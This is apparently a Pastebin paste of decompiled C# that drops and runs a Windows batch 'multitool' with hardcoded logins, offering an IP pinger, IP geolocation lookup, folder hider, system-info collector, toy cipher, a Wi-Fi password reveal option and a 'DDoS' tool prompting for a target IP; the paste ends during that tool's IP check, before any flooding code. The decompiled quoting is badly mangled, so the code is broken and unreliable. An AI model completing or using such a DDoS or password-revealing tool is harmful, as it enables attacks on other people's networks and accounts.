Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Diagnostics;
- using System.IO;
- using System.Text;
- using Microsoft.VisualBasic.CompilerServices;
- [StandardModule]
- internal sealed class BtE
- {
- [STAThread]
- public static void Main()
- {
- if (File.Exists(Environment.GetEnvironmentVariable("TMP")"\\cmd.bat"))
- {
- File.Delete(Environment.GetEnvironmentVariable("TMP")"\\cmd.bat");
- }
- File.WriteAllText(Environment.GetEnvironmentVariable("TMP")"\\cmd.bat", "@echo off"
- "@mode con cols=66 lines=39"
- "chcp 65001 >nul"
- ""
- ""
- ":login"
- "cls"
- "color a"
- "title *ZayyNsMultiTool* v0.2"
- "echo."
- "echo."
- "echo Date: [%date%]"
- "echo Time: [%time%]"
- "echo."
- "echo Developed by"
- "echo."
- "echo @@@@@@@@@ @@@@ @@@ "
- "echo @@@ @@@@@ @@@ "
- "echo @@@ @@@@@@@@ @@@ @@@ @@@ @@@ @@ @@@ @@@ "
- "echo @@@ @@@ @@@ @@@ @@@ @@@ @@ @@@ @@@ "
- "echo @@@ @@@@@@@@ @@@ @@@ @@@ @@@ @@ @@@@@@ "
- "echo @@@ @@@@ @@@ @@@@@@ @@@@@@ @@ @@@@@ "
- "echo @@@@@@@@@ @@@@@@@@@ @@@@@ @@@@ @@ @@@ "
- "echo @@@ @@@ "
- "echo @@@ @@@ "
- "echo @@ @@ ZayyN_#2829"
- "echo (discord) "
- "echo ------------------------------------------------------------------"
- "echo."
- "echo #################"
- "echo # #"
- "echo # Please login #"
- "echo # #"
- "echo #################"
- "echo. "
- "set /p user=Username:"
- "set /p pass=Password:"
- "if %user% == Admin if %pass% == 1337 goto Admin"
- "if %user% == Guest if %pass% == 1234 goto Guest"
- "color c"
- "echo."
- "echo."
- "echo."
- "echo."
- "echo !!! Incorrect username or password try it again !!!"
- "timeout 4 >nul"
- "cls"
- "goto login"
- ""
- ":Guest"
- "color a"
- "@mode con cols=84 lines=39"
- "cls "
- "title /ZayyNsMultiTool/ v0.2"
- "echo."
- "echo @@@@@ @@@@@ @@ @@ @@ @@@ @@@ "
- "echo @@@@@@ @@@@@@ @@@ @@@ @@ @@@@@@ @@@@@@ @@@@@@ @@@@@@@ @@@ "
- "echo @@@ @@@@@ @@@ @@@ @@@@ @@ @@@ @@ @@@@ @@@@ @@@ @@@ @@@@ @@@ "
- "echo @@@ @@@@ @@@ @@@ @@@@ @@ @@@ @@ @@@@ @@@ @@@@ @@@ @@@ @@@ "
- "echo @@@ @@@ @@@ @@@@@@@@@ @@ @@@@@ @@ @@@@ @@@@@@@@ @@@@@@@ @@@ "
- "echo."
- "echo Logged in as %user% (limited permissions)"
- "echo Type [logout] to log out"
- "echo."
- "echo #############################"
- "echo # # Date: [%date%]"
- "echo # 1.) Pinger # Time: [%time%]"
- "echo # 2.) Ip lookup #"
- "echo # 3.) PC info #"
- "echo # 4.) DDoS #"
- "echo # 5.) Cache cleaner #"
- "echo # 6.) Shutdown timer #"
- "echo # #"
- "echo #############################"
- "echo."
- "echo Enter option [1-6] ..."
- "set /p main="
- "if %main% == 1 goto ippingertool"
- "if %main% == 2 goto iplookuptool"
- "if %main% == 3 goto computerinfo"
- "if %main% == 4 goto ddostool"
- "if %main% == 5 goto cachecleanertool"
- "if %main% == 6 goto shutdowntimertool"
- ""
- "if %main% == logout goto login"
- "if %main% == Logout goto login"
- "cls"
- "goto Guest"
- ""
- ":Admin"
- "color a"
- "@mode con cols=84 lines=39"
- "cls "
- "title /ZayyNsMultiTool/ v0.2"
- "echo."
- "echo @@@@@ @@@@@ @@ @@ @@ @@@ @@@ "
- "echo @@@@@@ @@@@@@ @@@ @@@ @@ @@@@@@ @@@@@@ @@@@@@ @@@@@@@ @@@ "
- "echo @@@ @@@@@ @@@ @@@ @@@@ @@ @@@ @@ @@@@ @@@@ @@@ @@@ @@@@ @@@ "
- "echo @@@ @@@@ @@@ @@@ @@@@ @@ @@@ @@ @@@@ @@@ @@@@ @@@ @@@ @@@ "
- "echo @@@ @@@ @@@ @@@@@@@@@ @@ @@@@@ @@ @@@@ @@@@@@@@ @@@@@@@ @@@ "
- "echo."
- "echo Logged in as %user%"
- "echo Type [logout] to log out"
- "echo."
- "echo #############################"
- "echo # # Date: [%date%]"
- "echo # 1.) Pinger # Time: [%time%]"
- "echo # 2.) Ip lookup #"
- "echo # 3.) Locked folder #"
- "echo # 4.) PC info #"
- "echo # 5.) Text Encrypt #"
- "echo # 6.) Text Decrypt #"
- "echo # 7.) DDoS #"
- "echo # 8.) Cache cleaner #"
- "echo # 9.) Wifi Password reveal #"
- "echo # 10.) Shutdown timer #"
- "echo # #"
- "echo #############################"
- "echo."
- "echo Enter option [1-10] ..."
- "set /p main="
- "if %main% == 1 goto ippingertool"
- "if %main% == 2 goto iplookuptool"
- "if %main% == 3 goto locker"
- "if %main% == 4 goto computerinfo"
- "if %main% == 5 goto textencrypttool"
- "if %main% == 6 goto textdecrypttool"
- "if %main% == 7 goto ddostool"
- "if %main% == 8 goto cachecleanertool"
- "if %main% == 9 goto wifipass"
- "if %main% == 10 goto shutdowntimertool"
- ""
- "if %main% == logout goto login"
- "if %main% == Logout goto login"
- "cls"
- "goto Admin"
- ""
- ""
- ""
- ""
- ""
- ":ippingertool"
- "@echo off"
- "Title /ZayyNsPINGER/"
- "color a"
- "cls"
- "mode con lines=15 cols=110"
- ":reboot"
- "color a"
- "echo I===============================I"
- "echo ZayyNs IP PINGER "
- "echo I===============================I"
- "set /p IP=Enter ip or url:"
- ":ping"
- "color a"
- "PING -n 1 %IP% | FIND "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"TTL="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "IF ERRORLEVEL 1 (SET in=c & goto offline)"
- "ping -t 2 0 10 127.0.0.1 >nul"
- "pause"
- "goto %user%"
- ":offline"
- "cls"
- "color c"
- "echo Server or Client is OFFLINE !"
- "pause"
- "cls"
- "goto %user%"
- ""
- ""
- ""
- ""
- ":iplookuptool"
- "@echo off"
- "title /ZayyNsIPLookup/"
- "color a"
- "mode con lines=12 cols=70"
- "setlocal ENABLEDELAYEDEXPANSION"
- "set webclient=webclient"
- "del "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%temp%\\%webclient%.vbs"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" /f /q /s >nul"
- "del "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%temp%\\response.txt"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" /f /q /s >nul"
- ":menu"
- "cls"
- "title /ZayyNsIPLookup/"
- "echo."
- "echo."
- "echo."
- "echo."
- "echo."
- "echo."
- "echo. What are you want to do?"
- "echo."
- "echo Watch my own IP: (1)"
- "echo Watch someone else IP: (2)"
- "echo Back to menu: (3)"
- "echo."
- "echo."
- "echo."
- "echo."
- "goto action"
- ":input"
- "echo."
- "echo Write an actual number!"
- "echo."
- ":action"
- "echo."
- "set /p action=Type your choice. 1,2,3: "
- "if '%action%'=='1' echo sUrl = "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"http://ipinfo.io/json"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" > %temp%\\%webclient%.vbs & goto localip"
- "if '%action%'=='2' goto iplookup"
- "if '%action%'=='3' goto %user%"
- "goto input"
- ":iplookup"
- "color a"
- "cls"
- "echo."
- "echo Write the IP!"
- "echo."
- "set ip=127.0.0.1"
- "set /p ip=IP: "
- "echo sUrl = "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"http://ipinfo.io/%ip%/json"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" > %temp%\\%webclient%.vbs"
- ":localip"
- "cls"
- "echo set oHTTP = CreateObject("Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"MSXML2.ServerXMLHTTP.6.0"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })") >> %temp%\\%webclient%.vbs"
- "echo oHTTP.open "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"GET"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })", sUrl,false >> %temp%\\%webclient%.vbs"
- "echo oHTTP.setRequestHeader "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Content-Type"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })", "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"application/x-www-form-urlencoded"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" >> %temp%\\%webclient%.vbs"
- "echo oHTTP.setRequestHeader "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Content-Length"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })", Len(sRequest) >> %temp%\\%webclient%.vbs"
- "echo oHTTP.send sRequest >> %temp%\\%webclient%.vbs"
- "echo HTTPGET = oHTTP.responseText >> %temp%\\%webclient%.vbs"
- "echo strDirectory = "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%temp%\\response.txt"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" >> %temp%\\%webclient%.vbs"
- "echo set objFSO = CreateObject("Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Scripting.FileSystemObject"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })") >> %temp%\\%webclient%.vbs"
- "echo set objFile = objFSO.CreateTextFile(strDirectory) >> %temp%\\%webclient%.vbs"
- "echo objFile.Write(HTTPGET) >> %temp%\\%webclient%.vbs"
- "echo objFile.Close >> %temp%\\%webclient%.vbs"
- "rem echo Msgbox HTTPGET,vbSystemModal+vbOKOnly+vbInformation, "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"IP Info"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" >> %temp%\\%webclient%.vbs"
- "echo Wscript.Quit >> %temp%\\%webclient%.vbs"
- "start %temp%\\%webclient%.vbs"
- "set /a requests=0"
- "echo."
- "rem echo wait for API's answer. . ."
- "echo Searching. . ."
- ":checkresponseexists"
- "set /a requests=%requests%1"
- "if %requests% gtr 7 goto failed"
- "IF EXIST "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%temp%\\response.txt"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" ("
- "goto response_exist"
- ") ELSE ("
- "ping 127.0.0.1 -n 2 -w 1000 >nul"
- "goto checkresponseexists"
- ")"
- ":failed"
- "color c"
- "taskkill /f /im wscript.exe >nul"
- "del "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%temp%\\%webclient%.vbs"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" /f /q /s >nul"
- "echo."
- "echo We dont got answer API."
- "echo."
- "pause"
- "goto menu"
- ":response_exist"
- "cls"
- "echo."
- "for /f "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"delims= \t"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%i in ('findstr /i "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"ip hostname city region country loc org postal"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %temp%\\response.txt') do ("
- "\tset data=%%i"
- "\tset data=!data:,=!"
- "\tset data=!data:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"=Not Listed!"
- "\tset data=!data:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"=!"
- "\tset data=!data:ip:=\u001b[40;31mIP:\t\t!"
- "\tset data=!data:hostname:=\u001b[40;32mHostname:\t!"
- "\tset data=!data:city:=\u001b[40;33mCity:\t\t!"
- "\tset data=!data:region:=\u001b[40;34mState:\t!"
- "\tset data=!data:country:=\u001b[40;35mCountry:\t!"
- "\tset data=!data:loc:=\u001b[40;36mLocation:\t!"
- "\tset data=!data:org:=\u001b[40;37mISP:\t\t!"
- "\tset data=!data:postal:=\u001b[40;31mPostal:\t!"
- "\techo \u001b[40;31m!data!"
- ")"
- "echo."
- "del "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%temp%\\%webclient%.vbs"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" /f /q /s >nul"
- "del "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%temp%\\response.txt"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" /f /q /s >nul"
- "pause"
- "if '%ip%'=='' goto menu"
- "goto iplookup"
- "exit"
- ""
- ""
- ""
- ":locker"
- "@echo off"
- "color a"
- "title Folder Locker by ZayyN"
- "if EXIST "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" goto UNLOCK"
- "if NOT EXIST Locker goto MDLOCKER"
- ":CONFIRM"
- "echo Are you sure u want to Lock the folder(Y/N)"
- "set/p "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"cho=>"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "if %cho%==Y goto LOCK"
- "if %cho%==y goto LOCK"
- "if %cho%==n goto END"
- "if %cho%==N goto END"
- "echo Invalid choice."
- "timeout 2 >nul"
- "goto CONFIRM"
- ":LOCK"
- "ren Locker "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "attrib +h +s "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "echo Folder locked"
- "timeout 2 >nul"
- "goto End"
- ":UNLOCK"
- "echo Enter password to Unlock folder..."
- "set/p "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"pass=>"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "if NOT %pass%==1337 goto FAIL"
- "attrib -h -s "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "ren "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" Locker"
- "echo Folder Unlocked successfully..."
- "timeout 2 >nul"
- "goto End"
- ":FAIL"
- "echo Invalid password "
- "timeout 2 >nul"
- "goto end"
- ":MDLOCKER"
- "md Locker"
- "echo Locker created successfully"
- "timeout 2 >nul"
- "goto End"
- ":End"
- "goto %user%"
- ""
- ""
- ""
- ""
- ":computerinfo"
- "@echo off"
- "title PC info"
- "color a"
- "if %os%==Windows_NT goto WINNT"
- "goto NOCON"
- ""
- ":WINNT"
- "echo .Using a Windows NT based system"
- "echo ..%computername%"
- ""
- "REM set variables"
- "set system="
- "set manufacturer="
- "set model="
- "set serialnumber="
- "set osname="
- "set sp="
- "setlocal ENABLEDELAYEDEXPANSION"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"volume=C:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "set totalMem="
- "set availableMem="
- "set usedMem="
- ""
- "echo Getting data [Computer: %computername%]..."
- "echo Please Wait...."
- ""
- "REM Get Computer Name"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=2 delims='='"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%A in ('wmic OS Get csname /value') do SET system=%%A"
- ""
- "REM Get Computer Manufacturer"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=2 delims='='"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%A in ('wmic ComputerSystem Get Manufacturer /value') do SET manufacturer=%%A"
- ""
- "REM Get Computer Model"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=2 delims='='"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%A in ('wmic ComputerSystem Get Model /value') do SET model=%%A"
- ""
- "REM Get Computer Serial Number"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=2 delims='='"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%A in ('wmic Bios Get SerialNumber /value') do SET serialnumber=%%A"
- ""
- "REM Get Computer OS"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=2 delims='='"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%A in ('wmic os get Name /value') do SET osname=%%A"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=1 delims='|'"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%A in ("Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%osname%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })") do SET osname=%%A"
- ""
- "REM Get Computer OS SP"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=2 delims='='"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%A in ('wmic os get ServicePackMajorVersion /value') do SET sp=%%A"
- ""
- "REM Get Memory"
- "FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=4"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%a in ('systeminfo ^| findstr Physical') do if defined totalMem (set availableMem=%%a) else (set totalMem=%%a)"
- "set totalMem=%totalMem:,=%"
- "set availableMem=%availableMem:,=%"
- "set /a usedMem=totalMem-availableMem"
- ""
- "FOR /f "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=1*delims=:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%i IN ('fsutil volume diskfree %volume%') DO ("
- " SET "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"diskfree=!disktotal!"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- " SET "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"disktotal=!diskavail!"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- " SET "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"diskavail=%%j"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ")"
- "FOR /f "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=1,2"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%i IN ("Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%disktotal% %diskavail%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })") DO SET "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"disktotal=%%i"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"& SET "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"diskavail=%%j"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "cls"
- ""
- "echo done!"
- ""
- "echo --------------------------------------------"
- "echo System Name: %system%"
- "echo Manufacturer: %manufacturer%"
- "echo Model: %model%"
- "echo Serial Number: %serialnumber%"
- "echo Operating System: %osname%"
- "echo C:\\ Total: %disktotal:~0,-9% GB"
- "echo C:\\ Avail: %diskavail:~0,-9% GB"
- "echo Total Memory: %totalMem%"
- "echo Used Memory: %usedMem%"
- "echo Computer Processor: %processor_architecture%"
- "echo Service Pack: %sp%"
- "echo --------------------------------------------"
- ""
- "REM Generate file"
- "SET file="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%~dp0%computername%.txt"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "echo -------------------------------------------- >> %file%"
- "echo Details For: %system% >> %file%"
- "echo Manufacturer: %manufacturer% >> %file%"
- "echo Model: %model% >> %file%"
- "echo Serial Number: %serialnumber% >> %file%"
- "echo Operating System: %osname% >> %file%"
- "echo C:\\ Total: %disktotal:~0,-9% GB >> %file%"
- "echo C:\\ Avail: %diskavail:~0,-9% GB >> %file%"
- "echo Total Memory: %totalMem% >> %file%"
- "echo Used Memory: %usedMem% >> %file%"
- "echo Computer Processor: %processor_architecture% >> %file%"
- "echo Service Pack: %sp% >> %file%"
- "echo -------------------------------------------- >> %file%"
- ""
- "REM request user to push any key to continue"
- "pause"
- ""
- "goto END"
- ""
- ":NOCON"
- "echo Error...Invalid Operating System..."
- "echo Error...No actions were made..."
- "timeout 2 >nul"
- "goto END"
- ""
- ":END"
- "goto %user%"
- ""
- ""
- ""
- ":textencrypttool"
- "cls"
- "@echo off"
- "setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION"
- "title Encrypt"
- "color a"
- ":mainmenu"
- "set savefile=on"
- "::set Encrypt=Nothing"
- "(set CHAR[a]=UDFM45) & (set CHAR[b]=H21DGF) & (set CHAR[c]=FDH56D) & (set CHAR[d]=FGS546) & (set CHAR[e]=JUK4JH)"
- "(set CHAR[f]=ERG54S) & (set CHAR[g]=T5H4FD) & (set CHAR[h]=RG641G) & (set CHAR[i]=RG4F4D) & (set CHAR[j]=RT56F6)"
- "(set CHAR[k]=VCBC3B) & (set CHAR[l]=F8G9GF) & (set CHAR[m]=FD4CJS) & (set CHAR[n]=G423FG) & (set CHAR[o]=F45GC2)"
- "(set CHAR[p]=TH5DF5) & (set CHAR[q]=CV4F6R) & (set CHAR[r]=XF64TS) & (set CHAR[s]=X78DGT) & (set CHAR[t]=TH74SJ)"
- "(set CHAR[u]=BCX6DF) & (set CHAR[v]=FG65SD) & (set CHAR[w]=4KL45D) & (set CHAR[x]=GFH3F2) & (set CHAR[y]=GH56GF)"
- "(set CHAR[z]=45T1FG) & (set CHAR[1]=D4G23D) & (set CHAR[2]=GB56FG) & (set CHAR[3]=SF45GF) & (set CHAR[4]=P4FF12)"
- "(set CHAR[5]=F6DFG1) & (set CHAR[6]=56FG4G) & (set CHAR[7]=USGFDG) & (set CHAR[8]=FKHFDG) & (set CHAR[9]=IFGJH6)"
- "(set CHAR[0]=87H8G7) & (set CHAR[@]=G25GHF) & (set CHAR[#]=45FGFH) & (set CHAR[$]=75FG45) & (set CHAR[*]=54GDH5)"
- "(set CHAR[(]=45F465) & (set CHAR[.]=HG56FG) & (set CHAR[,]=DF56H4) & (set CHAR[-]=F5JHFH) & (set CHAR[ ]=SGF4HF)"
- "(set CHAR[\\]=45GH45) & (set CHAR[/]=56H45G)"
- "echo Enter a text to encrypt:"
- "set /p Encrypt="
- "cls"
- "set Encrypt2=%Encrypt%"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"EncryptOut="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ":encrypt2"
- "set char=%Encrypt2:~0,1%"
- "set Encrypt2=%Encrypt2:~1%"
- "set EncryptOut=%EncryptOut%!CHAR[%char%]!"
- "if not "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%Encrypt2%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"=="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" goto encrypt2"
- "echo Input string: %Encrypt%"
- "echo."
- "echo Output string: %EncryptOut%"
- "set string=%EncryptOut%"
- "set temp_str=%string%"
- "set str_len=0"
- ":lengthloop"
- "if defined temp_str ("
- "set temp_str=%temp_str:~1%"
- "set /A str_len += 1"
- "goto lengthloop )"
- "echo."
- "echo Output string is %str_len% characters long!"
- "if "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%savefile%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"=="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"on"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" echo.%EncryptOut%>>%~d0%~p0encrypted.txt"
- "echo."
- "pause"
- "cls"
- "goto %user%"
- ""
- ""
- ""
- ":textdecrypttool"
- "cls"
- "@echo off"
- "setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION"
- "title Decrypt"
- "color a"
- ":mainmenu"
- "set savefile=on"
- "::set Decrypt=Nothing"
- "(set CHAR[UDFM45]=a) & (set CHAR[H21DGF]=b) & (set CHAR[FDH56D]=c) & (set CHAR[FGS546]=d) & (set CHAR[JUK4JH]=e)"
- "(set CHAR[ERG54S]=f) & (set CHAR[T5H4FD]=g) & (set CHAR[RG641G]=h) & (set CHAR[RG4F4D]=i) & (set CHAR[RT56F6]=j)"
- "(set CHAR[VCBC3B]=k) & (set CHAR[F8G9GF]=l) & (set CHAR[FD4CJS]=m) & (set CHAR[G423FG]=n) & (set CHAR[F45GC2]=o)"
- "(set CHAR[TH5DF5]=p) & (set CHAR[CV4F6R]=q) & (set CHAR[XF64TS]=r) & (set CHAR[X78DGT]=s) & (set CHAR[TH74SJ]=t)"
- "(set CHAR[BCX6DF]=u) & (set CHAR[FG65SD]=v) & (set CHAR[4KL45D]=w) & (set CHAR[GFH3F2]=x) & (set CHAR[GH56GF]=y)"
- "(set CHAR[45T1FG]=z) & (set CHAR[D4G23D]=1) & (set CHAR[GB56FG]=2) & (set CHAR[SF45GF]=3) & (set CHAR[P4FF12]=4)"
- "(set CHAR[F6DFG1]=5) & (set CHAR[56FG4G]=6) & (set CHAR[USGFDG]=7) & (set CHAR[FKHFDG]=8) & (set CHAR[IFGJH6]=9)"
- "(set CHAR[87H8G7]=0) & (set CHAR[G25GHF]=@) & (set CHAR[45FGFH]=#) & (set CHAR[75FG45]=$) & (set CHAR[54GDH5]=*)"
- "(set CHAR[45F465]=() & (set CHAR[HG56FG]=.) & (set CHAR[DF56H4]=,) & (set CHAR[F5JHFH]=-) & (set CHAR[SGF4HF]= )"
- "(set CHAR[45GH45]=\\) & (set CHAR[56H45G]=/)"
- "echo Enter a text to decrypt:"
- "set /p Decrypt="
- "cls"
- "set Decrypt2=%Decrypt%"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"DecryptOut="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ":decrypt2"
- "set char=%Decrypt2:~0,6%"
- "set Decrypt2=%Decrypt2:~6%"
- "set DecryptOut=%DecryptOut%!CHAR[%char%]!"
- "if not "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%Decrypt2%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"=="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" goto decrypt2"
- "echo Input string: %Decrypt%"
- "echo."
- "echo Output string: %DecryptOut%"
- "set string=%DecryptOut%"
- "set temp_str=%string%"
- "set str_len=0"
- ":lengthloop"
- "if defined temp_str ("
- "set temp_str=%temp_str:~1%"
- "set /A str_len += 1"
- "goto lengthloop )"
- "echo."
- "echo Output string is %str_len% characters long!"
- "if "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%savefile%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"=="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"on"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" echo.%DecryptOut%>>%~d0%~p0decrypted.txt"
- "echo."
- "pause"
- "cls"
- "goto %user%"
- ""
- ""
- ""
- ":ddostool"
- "@mode con cols=115 lines=22"
- "title DDoS"
- ""
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"DIR=C:\\Users\\%username%\\AppData\\Local\\Temp\\DDoS"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ""
- "if exist %DIR% goto skipmd"
- "md %DIR%"
- ""
- ":skipmd"
- "cd %DIR%"
- "goto init"
- ""
- ":start"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"o= "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "DEL /F /Q /S *.bat *.dat"
- "color a"
- "@echo off"
- "cls"
- "echo. "
- "echo. "
- "echo @@@@@@@@@@@@@ @@@@@@@@@@@@ @@@@@@@@@@ "
- "echo @@@@ @@@@@@ @@@@ @@@@@@ @@@@@ @@ "
- "echo @@@@ @@@@@ @@@@ @@@@@ @@@@@@@@ @@@@ "
- "echo @@@@ @@@@ @@@@ @@@@ @@@@@@@@@@@@ @@@@@@ "
- "echo @@@@ @@@@ @@@@ @@@@ @@@@ @@@@ @@@@@@@@@ "
- "echo @@@@ @@@@ @@@@ @@@@ @@@ @@@@ @@@@@@ "
- "echo @@@@ @@@@@ @@@@ @@@@@ @@@@ @@@@ @@@@ "
- "echo @@@@ @@@@@@ @@@@ @@@@@@ @@@@ @@@@@ @@ @@@@@ "
- "echo @@@@@@@@@@@@@ @@@@@@@@@@@@ @@@@@@@@@@ @@@@@@@@@@ "
- "echo. "
- "echo Main menu (Back)"
- "echo."
- "set /p ip= IP to target:"
- "if %ip% == Back goto %user%"
- "if %ip% == back goto %user%"
- ""
- "echo Validating IP.."
- "ping %ip% -l 32 -t -n 1 >> %DIR%\\text.dat -n 1"
- ">nul find "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Please check the name and try again."Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %DIR%\\text.dat && ("
- " goto invalidip"
- ") || ("
- " goto validip2"
- ")"
- ":validip2"
- ">nul find "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Destination host unreachable."Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %DIR%\\text.dat && ("
- " goto invalidip"
- ") || ("
- " goto validip3"
- ")"
- ":validip3"
- ">nul find "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Request timed out."Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %DIR%\\text.dat && ("
- " goto invalidip"
- ") || ("
